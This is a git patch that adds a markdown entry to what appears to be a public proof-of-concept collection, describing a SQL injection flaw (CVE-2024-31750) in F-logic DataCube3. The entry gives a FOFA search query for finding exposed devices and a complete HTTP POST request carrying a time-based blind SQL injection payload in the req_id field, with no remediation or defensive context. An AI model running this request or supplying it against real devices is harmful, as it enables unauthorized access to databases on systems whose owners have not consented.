From 0b3701c2a04a8760a9e4e2349d6948a6513b2857 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 23 Apr 2024 12:45:38 +0800 Subject: [PATCH] =?UTF-8?q?Create=20F-logic=5FDataCube3=E5=AD=98=E5=9C=A8S?= =?UTF-8?q?QL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E(CVE-2024-31750).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ataCube3存在SQL注入漏洞(CVE-2024-31750).md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750).md diff --git a/F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750).md b/F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750).md new file mode 100644 index 0000000..c40fe7a --- /dev/null +++ b/F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750).md @@ -0,0 +1,20 @@ +## F-logic_DataCube3存在SQL注入漏洞(CVE-2024-31750) + +## fofa +``` +title=="DataCube3" +``` + +## poc +``` +POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type: application/x-www-form-urlencoded + +req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450 +```